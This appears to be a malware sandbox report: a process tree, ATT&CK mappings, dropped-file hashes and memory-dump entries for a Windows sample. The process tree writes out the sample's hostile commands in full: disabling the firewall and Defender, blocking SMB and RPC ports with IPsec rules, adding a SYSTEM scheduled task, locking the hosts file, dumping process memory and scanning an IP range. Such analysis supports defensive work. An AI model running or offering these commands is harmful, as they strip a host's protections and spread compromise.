- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "evgrntiyh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ajszieiei\bsuyvg.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:1572
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Modifies data under HKEY_USERS
  PID:304
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Modifies data under HKEY_USERS
  PID:2176
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Modifies data under HKEY_USERS
  PID:2196
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2488
- C:\Windows\TEMP\mfebbbrby\eszugbung.exe
  C:\Windows\TEMP\mfebbbrby\eszugbung.exe -accepteula -mp 280 C:\Windows\TEMP\mfebbbrby\280.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Modifies data under HKEY_USERS
  PID:2664
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Modifies data under HKEY_USERS
  PID:464
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:2676
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:284
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:2764
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Modifies data under HKEY_USERS
  PID:2136
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Modifies data under HKEY_USERS
  PID:2376
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:2692
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:688
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Modifies data under HKEY_USERS
    PID:616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:2820
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:2284
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:1432
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:1532
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:1704
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:1904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:2288
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:2272
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:2804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:1596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:1736
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:1148
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:2028
- C:\Windows\TEMP\mfebbbrby\eszugbung.exe
  C:\Windows\TEMP\mfebbbrby\eszugbung.exe -accepteula -mp 1212 C:\Windows\TEMP\mfebbbrby\1212.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\TEMP\mfebbbrby\eszugbung.exe
  C:\Windows\TEMP\mfebbbrby\eszugbung.exe -accepteula -mp 1276 C:\Windows\TEMP\mfebbbrby\1276.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2620
- C:\Windows\TEMP\mfebbbrby\eszugbung.exe
  C:\Windows\TEMP\mfebbbrby\eszugbung.exe -accepteula -mp 1252 C:\Windows\TEMP\mfebbbrby\1252.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2528
- C:\Windows\TEMP\mfebbbrby\eszugbung.exe
  C:\Windows\TEMP\mfebbbrby\eszugbung.exe -accepteula -mp 900 C:\Windows\TEMP\mfebbbrby\900.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\TEMP\mfebbbrby\eszugbung.exe
  C:\Windows\TEMP\mfebbbrby\eszugbung.exe -accepteula -mp 2388 C:\Windows\TEMP\mfebbbrby\2388.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2652
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\mfebbbrby\tgykbkbiz\scan.bat
  2⤵
  - Loads dropped DLL
  PID:1068
- - C:\Windows\mfebbbrby\tgykbkbiz\liaekeiyb.exe
    liaekeiyb.exe TCP 89.149.0.1 89.149.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:2260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:268
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:4076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\SysWOW64\kkqiuy.exe
C:\Windows\SysWOW64\kkqiuy.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2844

C:\Windows\system32\taskeng.exe
taskeng.exe {B018C88D-7BEF-4D0B-9580-B4FA938E246B} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1600
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bybsswu.exe
  2⤵
  PID:2752
- - C:\Windows\ime\bybsswu.exe
    C:\Windows\ime\bybsswu.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
    PID:1416
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nubbucjk\bybsswu.exe /p everyone:F
  2⤵
  PID:1612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1976
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\nubbucjk\bybsswu.exe /p everyone:F
    3⤵
    PID:1588
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ajszieiei\bsuyvg.exe /p everyone:F
  2⤵
  PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2692
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\TEMP\ajszieiei\bsuyvg.exe /p everyone:F
    3⤵
    PID:2712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\IME\bybsswu.exe

Filesize
1.3MB

MD5
c4328956ab8c5fa105cef1323074066c

SHA1
2cbea54b35b226caed25eb170c654394ceea095f

SHA256
51dd329076a98de673a441f753f3a442f0f73693996b41329731d56f6128f871

SHA512
6f63801f7b6944b1043ba75f0b8ce17292e8d085869eebfc05c715b0ed25360272adeb8f80d93494f09b36225842e18c8d3e671332c35e009881d189f6b0647d

Download Submit
C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\ajszieiei\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\mfebbbrby\1212.dmp

Filesize
1.4MB

MD5
8f9a2d2bdbae3caf2cd80d644be69cd2

SHA1
24f85d771d11c9bbba836b3f852fa470f5641703

SHA256
21e1aa3d8106588a6e457a3da3ad3395c1499a4c1baade1b9b0b4a1b83e215f4

SHA512
23a7d84d603d5e68420f4819cddbc39ef1ffe764f6a1b1f5e39ea53cd1c0369a24ff31cde054d99c2f6302d52f4efd6f4f0384d3fe507aa34c84c58caa41d61c

Download Submit
C:\Windows\TEMP\mfebbbrby\1252.dmp

Filesize
6.9MB

MD5
d3ddd507d613bc3f4546f926d7f30883

SHA1
85f1e2ea844b82fe718555752d174c9638fb6435

SHA256
eafdad86c3aee4c8947045e7f8a1e361d9707033abbb1565fe6128089473c6a8

SHA512
a3ff390830c57474a15446ff58919e15c3038b8ac7d547175e6a0a48764a846368841ccb8423f8a46d5e3fc7a3742581962a42ca2816e2e5d5f187ccc398d9b4

Download Submit
C:\Windows\TEMP\mfebbbrby\1276.dmp

Filesize
1.3MB

MD5
af25840397c31f1a95542855c2ffad56

SHA1
c829951645f96ccef62efcdba356b6a0e8201d24

SHA256
09962a8dfbf496e4e1f1e62bf7646c687c7fa4f871ca231544d28a093aceda93

SHA512
af0be84b36f32930140e4576d0aab5e956388b6ae01313c102ad87d0381487aa119ba9a35813a3a4000665c4adf2b4de1a61addfd3529d707c868c9e5f9fcd32

Download Submit
C:\Windows\TEMP\mfebbbrby\2388.dmp

Filesize
843KB

MD5
6cfc08780cb2a074b058ec457f748579

SHA1
17f6ddba4769c95aaede881e9588686e68c22f7d

SHA256
d4ec1de3bfb7c50230da8a8b684442ddfd20e8a1e3646e3bdf1066e741d451ec

SHA512
6d3df261399162b4eecf64b5d59fbfc731a8c950f18b2e021f12f70566b01568f5ea0626842d8b720bdcf9784c2b212b6aac1693530d4bdb186d344d8405e205

Download Submit
C:\Windows\TEMP\mfebbbrby\280.dmp

Filesize
4.5MB

MD5
4007e2d490a9bbb911221cf749c23079

SHA1
7a05c9c46eeff775d274a8b073970b0ff79132b4

SHA256
76bad2a32d6c25286c8cf67be61ade542f6b527b089ed8fe06641ad5cc75d1ef

SHA512
81e5700a0c56c9be7df28936741744e33f56fddfa17ad51fc24eda02c342b9f34483007c410ec5f86cb930aa9c7cc396de25950efb58df9418f680d41867e4dc

Download Submit
C:\Windows\TEMP\mfebbbrby\900.dmp

Filesize
2.2MB

MD5
604523dda5c823b2cc48f281a6199876

SHA1
bff7daafd4449c9b9c519afbe726bf3bf0d2b2b2

SHA256
e021479c1cd2f2596d76ccf15291092bd620c7862b6fdbf7cd8ebfd4415de8d2

SHA512
22360f3f1a0e343d06d764ea3ee968736e0b0d4c409b97b82fe064ade56637a2f85d55ca9cdd02d8145e1aefa53089461ab950a6c50b19919c271a708ae3bdfa

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\ime\bybsswu.exe

Filesize
1.3MB

MD5
23a00c308fb9038177bbecf414b9ee24

SHA1
5f5dbf931002aa692ce14c5b773e73be656d4dfb

SHA256
96c54d3253d5c5f6b9f0c630ea3ae0ab8753ad58b7e2346ca8206e3cd8c43a2a

SHA512
e03c8da56f910ed22b00e0939f56bdbca3df1b0b6bd051dbb394d4b22f2473f8abc5ce5a771d466bc7eea4184131071ae863889b506e8e8eb2fdc34cbbbdd0bf

Download Submit
C:\Windows\mfebbbrby\tgykbkbiz\ip.txt

Filesize
162B

MD5
f4702d4793edc7003d63688663f52458

SHA1
f949a07b380f177b2ec9e034baee444b5ae70e86

SHA256
4941a31f3c7eb17b5699a8645f186f66825c3e3449d6f423714e2e36e94d374f

SHA512
61367a8e282e68da74976d3710b73d5a1061a598b35dffdf23d13cc0bc8d4eef5971a307c1c0db406279d4215fbe3e742176ea01f795e6874ce3c45b02fb9b82

Download Submit
C:\Windows\mfebbbrby\tgykbkbiz\liaekeiyb.exe

Filesize
63KB

MD5
821ea58e3e9b6539ff0affd40e59f962

SHA1
635a301d847f3a2e85f21f7ee12add7692873569

SHA256
a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

SHA512
0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

Download Submit
C:\Windows\mfebbbrby\tgykbkbiz\scan.bat

Filesize
160B

MD5
a184be1703a40a53fd5220b8a9525398

SHA1
9ed7e9b07321a8c1f2be5071ec5076abecbdaf40

SHA256
134d84e241ce839923f7cc2f68e8222c1e5e0c44a36b677f4df0db50a8886f0c

SHA512
9e6424df5cdcf5aaf5e494af4215e3b87a51f72837f3cb1c39830c9c5c668e6c25ab17785fa26e33985c1ab06db7e3cf4961eb43dff8eedd8d819f82924c5f62

Download Submit
C:\Windows\mfebbbrby\tgykbkbiz\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
975B

MD5
b5d815ff5310f62de5020591be598bc0

SHA1
8013562b0cc2516d16d474308c8982a31b7f5dd0

SHA256
a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

SHA512
4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

Download Submit
\Windows\Temp\ajszieiei\bsuyvg.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
\Windows\Temp\mfebbbrby\eszugbung.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
\Windows\Temp\nsjBDE5.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
\Windows\Temp\nsjBDE5.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
\Windows\mfebbbrby\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
\Windows\mfebbbrby\tgykbkbiz\hzuqkpuek.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
\Windows\nubbucjk\bybsswu.exe

Filesize
1.9MB

MD5
ddb6e6bb5d9124ca94db33d5bf8073ee

SHA1
f18e6257e1849cad0120005c1b508b673a5e46d7

SHA256
73cf4aa187df1e7a0566a176b2485bce66dde31929faab72e7ee3c2a54c96877

SHA512
78100bc46ad982d06445dc6827c58563df80ee70ea9d2cd42c2c77b5e60b48743e432598e41e3f7fce956716b3906ed4f0acb9f05b27bf84d96b693471460366

Download Submit
\Windows\nubbucjk\bybsswu.exe

Filesize
8.9MB

MD5
32f67c5a2761163404e0a90f01cc0c2d

SHA1
e334a5c915d31d2b4019a2b53315a0e0bd847cfe

SHA256
11eb364e9ae20b73eedfe93f81014aa7022c2a94238620480305ea18388fc1ee

SHA512
fd4e74efc168e88739ded5700a30767a941bb2ec17267eb90fbb1e19a6db31ac1176e4a40c22b562c85a83978240b93cfd49cbff3f7ed6621800e469d2c0bdae

Download Submit
memory/992-209-0x000000013FCD0000-0x000000013FD2B000-memory.dmp

Filesize
364KB

Download
memory/992-211-0x000000013FCD0000-0x000000013FD2B000-memory.dmp

Filesize
364KB

Download
memory/1068-242-0x00000000001F0000-0x0000000000202000-memory.dmp

Filesize
72KB

Download
memory/1636-133-0x0000000000600000-0x00000000006EE000-memory.dmp

Filesize
952KB

Download
memory/1636-134-0x0000000000600000-0x00000000006EE000-memory.dmp

Filesize
952KB

Download
memory/2016-74-0x00000000001E0000-0x000000000022C000-memory.dmp

Filesize
304KB

Download
memory/2028-162-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/2224-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2260-244-0x0000000000B20000-0x0000000000B32000-memory.dmp

Filesize
72KB

Download
memory/2408-247-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-198-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-245-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-185-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-149-0x0000000000110000-0x0000000000120000-memory.dmp

Filesize
64KB

Download
memory/2408-246-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-228-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-150-0x0000000000120000-0x0000000000124000-memory.dmp

Filesize
16KB

Download
memory/2408-224-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-147-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-222-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-221-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-152-0x0000000000310000-0x0000000000314000-memory.dmp

Filesize
16KB

Download
memory/2408-249-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-207-0x000000013FFF0000-0x0000000140110000-memory.dmp

Filesize
1.1MB

Download
memory/2408-208-0x0000000000120000-0x0000000000124000-memory.dmp

Filesize
16KB

Download
memory/2408-151-0x0000000000130000-0x0000000000134000-memory.dmp

Filesize
16KB

Download
memory/2524-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2528-202-0x000000013F310000-0x000000013F36B000-memory.dmp

Filesize
364KB

Download
memory/2528-200-0x000000013F310000-0x000000013F36B000-memory.dmp

Filesize
364KB

Download
memory/2556-142-0x000000013FEC0000-0x000000013FF1B000-memory.dmp

Filesize
364KB

Download
memory/2556-168-0x000000013FEC0000-0x000000013FF1B000-memory.dmp

Filesize
364KB

Download
memory/2620-192-0x000000013FF40000-0x000000013FF9B000-memory.dmp

Filesize
364KB

Download
memory/2620-190-0x000000013FF40000-0x000000013FF9B000-memory.dmp

Filesize
364KB

Download
memory/2652-217-0x000000013FC50000-0x000000013FCAB000-memory.dmp

Filesize
364KB

Download
memory/2652-219-0x000000013FC50000-0x000000013FCAB000-memory.dmp

Filesize
364KB

Download
memory/2660-189-0x0000000001990000-0x00000000019EB000-memory.dmp

Filesize
364KB

Download
memory/2660-197-0x0000000002A90000-0x0000000002BB0000-memory.dmp

Filesize
1.1MB

Download
memory/2660-223-0x0000000001A50000-0x0000000001AAB000-memory.dmp

Filesize
364KB

Download
memory/2660-199-0x0000000001990000-0x00000000019EB000-memory.dmp

Filesize
364KB

Download
memory/2660-180-0x0000000002530000-0x000000000258B000-memory.dmp

Filesize
364KB

Download
memory/2660-178-0x0000000001990000-0x00000000019EB000-memory.dmp

Filesize
364KB

Download
memory/2660-216-0x0000000001990000-0x00000000019EB000-memory.dmp

Filesize
364KB

Download
memory/2660-146-0x0000000002A90000-0x0000000002BB0000-memory.dmp

Filesize
1.1MB

Download
memory/2660-141-0x0000000002530000-0x000000000258B000-memory.dmp

Filesize
364KB

Download
memory/2904-183-0x000000013FD20000-0x000000013FD7B000-memory.dmp

Filesize
364KB

Download
memory/2904-181-0x000000013FD20000-0x000000013FD7B000-memory.dmp

Filesize
364KB

Download
memory/2920-136-0x000000013FB90000-0x000000013FC7E000-memory.dmp

Filesize
952KB

Download
memory/2920-135-0x000000013FB90000-0x000000013FC7E000-memory.dmp

Filesize
952KB

Download